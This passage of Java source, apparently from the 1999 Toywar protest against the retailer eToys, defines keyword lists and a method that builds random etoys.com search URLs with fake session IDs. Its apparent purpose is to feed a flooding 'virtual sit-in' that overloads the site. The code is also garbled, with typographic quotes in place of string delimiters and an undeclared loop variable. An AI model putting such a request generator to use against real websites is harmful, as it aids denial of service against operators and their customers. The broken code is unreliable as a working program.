„I’m+looking+for+the+etoy+url“,
„Is+there+any+art+here?“,
„Do+you+have+the+power+to+take+my+domain?“,
„Do+corporations+have+too+much+power?“,
„Does+etoys+care+about+their+image?“,
„Does+etoys+care+about+their+stock+price?“,
„Boston+Tea+Party+what+is+that?“,
„Only+two+customers+complained?“,
„hair+cut+kits“,
„orange+jacket“,
„electric+shaver“,
„digital+hijack“,
„Please+crush+us+too!“,
„How+are+christmas+sales?“,
„Did+you+know+you+were+in+the+Washington+Post?“,
„Did+you+know+you+were+on+NPR?“
};

String[] l2 = {
„Doom“,
„doom“,
„quake“,
„cyboars“,
„gadget“,
„Action+Figures“,
„Arts+Crafts“,
„Construction“,
„Dolls“,
„Games“,
„Learning“,
„Make-Believe“,
„Radio+Control“,
„Stuffed+Toys“,
„Barbie“,
„LEGO“,
„Little+Tikes“,
„Fisher-Price“,
„Hot+Wheels“,
„Department+56“,
„Learning+Curve“,
„Marvins+Magic“,
„Schylling“,
„Eden“,
„action+figures“,
„arts+crafts“,
„construction“,
„dolls“,
„games“,
„learning“,
„make-believe“,
„radio+control“,
„stuffed+toys“,
„barbie“,
„imaginary+limitz“,
„lego“,
„little+tikes“,
„fisher-price“,
„hot+wheels“,
„department+56“,
„learning+curve“,
„marvin’s+magic“,
„schylling“,
„eden“,
„Car+Seats“,
„Feeding“,
„Safety“,
„Bath“,
„Nursery“,
„Bedding“,
„Books“,
„Strollers“,
„Preemies“,
„Infant+Toys“,
„Clothing+Layette“,
„Twins+Triplets+More“,
„Evenflo“,
„Fisher-Price“,
„Graco“,
„Playtex“,
„The+First+Years“,
„Aprica“,
„Avent“,
„Combi“,
„Maclaren“,
„Mustela“,
„Barbie“,
„Blue’s+Clues“,
„Rugrats“,
„Sesame+Street“,
„Teletubbies“,
„Blaster“,
„Carmen+Sandiego“,
„Crayola“,
„Disney“,
„DK+Multimedia“,
„Edmark“,
„Fisher-Price“,
„Hasbro+Interactive“,
„Hot+Wheels“,
„JumpStart“,
„LEGO+Media“,
„LEGO+MINDSTORMS“,
„Magic+School Bus“,
„Mattel+Media“,
„Purple+Moon“,
„Reader+Rabbit“,
„Accessories“,
„Arts+Creativity“,
„Baby+Toddler“,
„Bundles+Special“,
„Packages“,
„Digital+Cameras“,
„Family+Software“,
„Foreign+Language“,
„Games+Activities“,
„Geography+Social+Studies“,
„Grade-Based+Software“,
„Interactive+Storybooks“,
„Interactive+Toys“,
„Just+for+Girls“,
„Logic+Thinking“,
„Math“,
„Reading“,
„Reference“,
„Science+Nature“,
„Test+Prep“,
„Transportation+Construction“,
„Typing“,
„1st+Person+Shooter“,
„Action+Adventure“,
„Classic/Retro“,
„Fighting“,
„Kids+Games“,
„Movie+Cartoon“,
„Puzzles+Cards“,
„Role+Playing+Games“,
„Simulations“,
„Strategy“,
„Baseball“,
„Basketball“,
„Football“,
„Hockey“,
„Hunting+Fishing“,
„Racing“,
„Soccer“,
„Winter+Sports“,
„Wrestling“,
„Cartoon+Characters“,
„Barney“,
„Compilations“,
„Dance“,
„Disney“,
„Educational“,
„Folk“,
„Kid+Essentials“,
„Lullabies“,
„Multicultural“,
„Music+Little+People“,
„Party+Songs“,
„Rock+Kids“,
„Schoolhouse Rock“,
„Sesame+Street“,
„Showtunes“,
„Sing-along“,
„Soundtracks“,
„Spiritual“,
„Storytelling“,
„Teen+Scene“,
„Timeless+Kid+Songs“,
„Travel+Tunes“,
„Classic+Literature“,
„Poetry“,
„Picture+Books“,
„Board+Baby+Books“,
„Beginning+to+Read“,
„Fairy+Tales+Fables“,
„Animal+Stories“,
„Transportation“,
„Pop-Ups+3-D+Books“,
„Books+about+Boys“,
„Books+about+Girls“,
„Books+on+Tape/CD“,
„Adventure+Suspense“,
„Fantasy“,
„Historical+Fiction“,
„Sports+Fiction“,
„Humor“,
„Anthologies“,
„The+Arts“,
„Crafts+Activities“,
„Learning“,
„Reference“,
„Families+Growing+Up“,
„Parenting“,
„Health“,
„Science+Nature“,
„Animal+Nonfiction“,
„Computers+the+Internet“,
„History+Geography“,
„Multicultural“,
„Religion+Holidays“,
„Biographies+Memoirs“,
„Sports+Nonfiction“
};

String[] l3 = {
„etoy“,
„rtmark“,
„edt“,
„fakeshop“,
„ETOY“,
„Etoy“,
„RTMARK“,
„EDT“,
„FAKESHOP“,
„irational“,
„monopolist“,
„artists“,
„artist“,
„rhizome“,
„corporate“,
„cultdeadcow“,
„federal+court“,
„hacker“,
„European+Union“
};

FormURLetoyNet() {
randy= new Random();
}

//http://www.etoys.com/html/et_home.shtml?SID=a28552353
public String getstring() {
String base=“exec/search.cgi?store=e&emp=et&keyword=“;
String str=““;
int t;

t=(int)(randy.nextDouble()*100);
if (t>=0 && t<=9) {
return „html/et_home.shtml?SID=a“+getID();
} else if (t>=10 && t<=15) {
return
base+l1[(int)(randy.nextDouble()*l1.length)];
} else {
str=str+base;
if ((int)(randy.nextDouble()*10)==0) {

str=str+l3[(int)(randy.nextDouble()*l3.length)]+“+“;
}

t=(int)(randy.nextDouble()*3);

if (t==0) {

str=str+l2[(int)(randy.nextDouble()*l2.length)]+“+“+

l2[(int)(randy.nextDouble()*l2.length)]+“+“+

l2[(int)(randy.nextDouble()*l2.length)];
} else if (t==1) {

str=str+l2[(int)(randy.nextDouble()*l2.length)]+“+“+

l2[(int)(randy.nextDouble()*l2.length)];
} else {

str=str+l2[(int)(randy.nextDouble()*l2.length)];
}
return str;
}
}

public String getID() {
String temp=““;
for (i=0; i<8; i++) {
temp+=((int)(randy.nextDouble()*10));
}
return temp;
}
}